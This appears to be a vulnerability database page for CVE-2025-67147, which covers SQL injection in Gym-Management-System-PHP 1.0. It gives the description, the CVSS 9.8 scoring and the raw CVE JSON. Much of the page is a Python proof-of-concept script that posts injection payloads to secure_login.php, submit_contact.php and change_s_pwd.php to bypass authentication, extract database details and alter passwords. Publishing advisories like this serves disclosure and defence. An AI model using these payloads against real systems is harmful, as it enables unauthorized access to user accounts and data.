Security Vulnerability Report
CVE-2025-67147 CVSS 9.8 CRITICAL

CVE-2025-67147

Published: 2026-01-12 21:15:59
Last Modified: 2026-04-15 00:35:42

Description

Multiple SQL Injection vulnerabilities exist in amansuryawanshi Gym-Management-System-PHP 1.0 via the 'name', 'email', and 'comment' parameters in (1) submit_contact.php, the 'username' and 'pass_key' parameters in (2) secure_login.php, and the 'login_id', 'pwfield', and 'login_key' parameters in (3) change_s_pwd.php. An unauthenticated or authenticated attacker can exploit these issues to bypass authentication, execute arbitrary SQL commands, modify database records, delete data, or escalate privileges to administrator level.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Gym-Management-System-PHP 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
'''
CVE-2025-67147 SQL Injection PoC
Target: Gym-Management-System-PHP 1.0
Vulnerable Files: submit_contact.php, secure_login.php, change_s_pwd.php
'''
import requests
import sys

TARGET = "http://target.com/gym-system/"

# PoC 1: Authentication Bypass in secure_login.php
def bypass_auth():
    """Bypass login authentication using SQL injection"""
    endpoint = f"{TARGET}secure_login.php"
    payload = {
        "username": "admin' OR '1'='1' --",
        "pass_key": "any"
    }
    print("[+] Attempting authentication bypass...")
    response = requests.post(endpoint, data=payload)
    if "dashboard" in response.text.lower() or response.status_code == 302:
        print("[+] Authentication bypass successful!")
    return response

# PoC 2: SQL Injection in submit_contact.php
def inject_contact_form():
    """Extract database information via contact form"""
    endpoint = f"{TARGET}submit_contact.php"
    # UNION-based injection to extract data
    payload = {
        "name": "test' UNION SELECT 1,2,version(),user(),5,6 -- ",
        "email": "[email protected]",
        "comment": "test"
    }
    print("[+] Sending SQL injection payload to contact form...")
    response = requests.post(endpoint, data=payload)
    print(f"[+] Response Status: {response.status_code}")
    return response

# PoC 3: SQL Injection in change_s_pwd.php
def inject_password_change():
    """Modify user passwords via SQL injection"""
    endpoint = f"{TARGET}change_s_pwd.php"
    payload = {
        "login_id": "1' OR '1'='1",
        "pwfield": "newpassword",
        "login_key": "123"
    }
    print("[+] Attempting password change injection...")
    response = requests.post(endpoint, data=payload)
    return response

if __name__ == "__main__":
    print("=" * 50)
    print("CVE-2025-67147 SQL Injection PoC")
    print("=" * 50)
    try:
        bypass_auth()
        inject_contact_form()
        inject_password_change()
    except Exception as e:
        print(f"[-] Error: {e}")

References

https://github.com/amansuryawanshi/Gym-Management-System-PHP/issues/3

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67147", "sourceIdentifier": "[email protected]", "published": "2026-01-12T21:15:59.133", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple SQL Injection vulnerabilities exist in amansuryawanshi Gym-Management-System-PHP 1.0 via the 'name', 'email', and 'comment' parameters in (1) submit_contact.php, the 'username' and 'pass_key' parameters in (2) secure_login.php, and the 'login_id', 'pwfield', and 'login_key' parameters in (3) change_s_pwd.php. An unauthenticated or authenticated attacker can exploit these issues to bypass authentication, execute arbitrary SQL commands, modify database records, delete data, or escalate privileges to administrator level."}, {"lang": "es", "value": "Existen múltiples vulnerabilidades de inyección SQL en amansuryawanshi Gym-Management-System-PHP 1.0 a través de los parámetros 'name', 'email' y 'comment' en (1) submit_contact.php, los parámetros 'username' y 'pass_key' en (2) secure_login.php, y los parámetros 'login_id', 'pwfield' y 'login_key' en (3) change_s_pwd.php. Un atacante no autenticado o autenticado puede explotar estos problemas para omitir la autenticación, ejecutar comandos SQL arbitrarios, modificar registros de la base de datos, eliminar datos o escalar privilegios a nivel de administrador."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/amansuryawanshi/Gym-Management-System-PHP/issues/3", "source": "[email protected]"}]}}